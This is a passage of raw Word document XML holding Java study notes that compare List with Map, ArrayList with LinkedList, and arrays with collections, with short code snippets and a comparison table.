          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E068DC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3C795B1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A9493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Integer&gt; map = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776BA3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0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777E2F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0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFB67E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0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCE63A2" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01D11FB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 map);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBA45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for key 'Apple': " + map.get("Apple"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFB162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8D96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DD59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25D1D35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Apple=10, Banana=20, Orange=30}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA6874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for key 'Apple': 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789F94B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DF47B">
          <v:rect id="_x0000_i1415" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1A057B"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Case Scenarios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A510C0A"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st</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624792A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an ordered collection of elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED110C3"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duplicate elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657D06B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ccess elements by index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0877A0A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List can be used for storing the history of user actions or maintaining an ordered list of students' names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705BF2E6"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Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12824A8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key-value pairs and perform fast lookups based on keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B72095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 must be unique, and you want to associate values to those keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DC2DF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Map can be used for storing student IDs (keys) with their corresponding names (values) or creating a dictionary with words as keys and definitions as values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DBFF6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8D00C">
          <v:rect id="_x0000_i1416" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E2AFE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ummary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E82BFFA"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n ordered collection of elements (with duplicates allowed) that provides random access by index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090BC74B"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A collection of key-value pairs where each key is unique, and you access elements based on keys rather than indices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E94A2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List and Map serve different purposes depending on whether you need to handle collections of data or associate values to unique keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D08E13" w14:textId="5E0939BC" w:rsidR="00A52B66"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17" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CA7E29" w14:textId="38A54E31" w:rsidR="00127D9B" w:rsidRPr="00CE4B95" w:rsidRDefault="00127D9B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="135" w:name="_Toc197867349"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between ArrayList and LinkedList?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="135"/>
    </w:p>
    <w:p w14:paraId="3056D5BE" w14:textId="1E97146A" w:rsidR="00127D9B" w:rsidRPr="00CE4B95"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ArrayList and LinkedList in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F87FA2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711DA">
          <v:rect id="_x0000_i1418" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="233C9B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nderlying Data Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67302390"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D12D1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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: ArrayList is backed by a dynamic array. Internally, it uses an array to store elements, and when the array is full, it creates a larger array and copies the elements over.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBBCD22"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2B95BE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node. This allows easy insertion and removal of elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C07A2DB"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4B46E">
          <v:rect id="_x0000_i1419" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFF81A8"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Performance (Access Time):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641DB231"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249E96D"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uses an array that supports direct access via an index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488CDC74"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EF23085"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quential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needs to traverse the list to reach the desired element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3C4B1E"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AAD0CD">
          <v:rect id="_x0000_i1420" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="001A677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 Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1000D29F"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A9CD7B0"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the array has enough capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0B26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because elements need to be shifted to accommodate new elements or fill the gap left by removed elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC0A091"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14DCBBC9"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both adding and removing elements at the beginning and end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731CD1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you have a reference to the node, but finding the node tak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so overall it'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38DDBE9"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193797">
          <v:rect id="_x0000_i1421" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="643A45F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Consumption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9C2500"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34430EA"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ArrayList requires less memory because it only stores the data and the array's capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A155887"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0FF1EC84"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Each node in a LinkedList needs to store two references (previous and next), so it consumes more memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0B43A4"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68414">
          <v:rect id="_x0000_i1422" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2ED38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Resizing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6576B46B"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5F451CD"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B53A796"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sizing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: LinkedLists do not require resizing since they allocate memory dynamically for each new element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53512B2A"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B5E682">
          <v:rect id="_x0000_i1423" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF1C5E5"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3541C1A7"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6AEE708"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Random Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If your program requires frequent access to elements by index and does not modify the list much (e.g., only adding/removing elements at the end), ArrayList is a better choice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE1DCB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ixed-Size Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the list size is mostly fixed and you only need occasional modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DC7ABE"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A5DC26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requent Insertions/Deletions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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58CACB">
          <v:rect id="_x0000_i1424" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="66542050"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Safety:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44688BCE" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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you need to use them in a multi-threaded environment, you should either use synchronization or use alternatives like CopyOnWriteArrayList.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C8498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87EC0">
          <v:rect id="_x0000_i1425" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B8DABE"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3568"/>
        <w:gridCol w:w="4682"/>
      </w:tblGrid>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="3842BFE6" w14:textId="77777777" w:rsidTr="00EC6922">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35AC6EA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31F0A3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48D897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344244" w:rsidRPr="00CE4B95" w14:paraId="077D151E" w14:textId="77777777" w:rsidTr="00EC6922">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73C8ACE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749DE54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rray</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6872644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y Linked List</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="6DDFF58F" w14:textId="77777777" w:rsidTr="00EC6922">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="649FC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Time (get/set)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61380A2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Random Access)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DEAA59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equential Access)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="37E8A3E7" w14:textId="77777777" w:rsidTr="00EC6922">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43DC6F6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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AA99C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hifting elements)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57E99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t start/end) but O(n) to find</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="286F6A4B" w14:textId="77777777" w:rsidTr="00EC6922">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72E4A4C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4892CB5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only data)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="428FF9D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due to additional references)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="14E1CD75" w14:textId="77777777" w:rsidTr="00EC6922">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="554D8E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1B6FC44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needs resizing (costly)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29C8BC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izing needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="7C37A8BD" w14:textId="77777777" w:rsidTr="00EC6922">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3593B97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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F3F4B1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ndom access, frequent access by index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A30C66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t insertion/deletion, no need for random access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="22B7B9A0" w14:textId="77777777" w:rsidTr="00EC6922">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E51669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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13DAEDA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large datasets, accessing elements by index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50DBFE4D"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queues, stacks, and other dynamic data structures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D58E6F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35DA6">
          <v:rect id="_x0000_i1426" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A0B81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6EC4277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 Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762A245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9C20FFA" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34EBBDF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52E385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481D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4547467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A681AA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66D2579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2E76680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10B1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1) access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6494311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2B821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n) due to shifting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342989B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3893F1A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AE0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771F4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 Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F6DA0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9162697" w14:textId="77777777" w:rsidR="00EC6922" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC6922" w:rsidP="00344244">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21D33A9C"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Example {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7C3EA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7C473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66C3D0F4"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1341CA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3BD76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5DC2A4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311FE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n) access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA2B6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3A37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1) removal if we have the reference)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E3A3B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180C6B0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324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2D4CBB"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AE5569B"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When you need fast access to elements by index, or if the list will mostly grow by adding elements at the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B386CBF"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When your application involves frequent insertions and deletions, particularly at the start or middle of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB0BFB7" w14:textId="08F99C93" w:rsidR="00EC6922" w:rsidRPr="00CE4B95"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27" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5A209A" w14:textId="77777777" w:rsidR="002B6B72" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6B72">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="136" w:name="_Toc197867350"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Array and Collections?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>
    </w:p>
    <w:p w14:paraId="5D6A5E19" w14:textId="4373092B" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA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multiple values, but they differ in terms of functionality, flexibility, and features. Below is a detailed comparison between arrays and collections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A8CF4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5DF9">
          <v:rect id="_x0000_i1428" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B23D93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5950DC56"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0E21A27E"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a fixed-size data structure that holds elements of the same type (primitive or object).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6367AF"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created, the size of the array cannot be changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8D68FB"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F015F2B"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art of the Java Collections Framework (JCF) and are dynamic data structures that store a group of objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ACC360"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are more flexible and offer various types lik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etc., which can dynamically grow and shrink in size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CFE9A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303DB">
          <v:rect id="_x0000_i1429" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B448DB5"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ze:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFD15E4"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B3DD46D"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The size of an array is fixed when it is created and cannot be changed. If you need a larger array, you must create a new one and copy the elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0B122A"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09C4DAC9"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Collections are dynamic in nature, meaning they can grow and shrink in size during runtime. For example, adding or removing elements in a List or Set is allowed without predefining the size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6009F88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7BFB4">
          <v:rect id="_x0000_i1430" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="798F627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Type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC2A916"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2DD69B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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An array stores elements of a single data type (all elements must be of the same type).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232D583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t[], String[], Object[].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9DFB71"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0C3E023"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terogeneous (for non-generic collections)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Collections can store elements of different data types (in the case of non-generic collections, like Vector or ArrayList before Java 5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057A8080"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 (for generic collections)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Modern collections in Java (from Java 5 onwards) are often generic, allowing type-safe collections of elements of the same type, like ArrayList&lt;String&gt; or HashSet&lt;Integer&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A0638D"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621962">
          <v:rect id="_x0000_i1431" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F17E2C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Flexibility:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0263BBDF"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72B09E4"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lexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Arrays have limited functionality. For example, they don't provide methods to add, remove, or find elements directly. Operations such as resizing or modifying array elements require manual code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59274C4A"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3A6A945"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y Flexible</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Collections provide a wide variety of methods to perform operations such as adding, removing, searching, sorting, and modifying elements, and they automatically handle resizing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB8959B"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7498E5">
          <v:rect id="_x0000_i1432" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33503779"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276CE078"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16EC2853"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fixed-size data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Since arrays have a fixed size and are stored contiguously in memory, accessing elements by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making arrays faster in terms of performance for fixed-size data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD3ABA0"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F6C1129"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nerally slower</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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A704B">
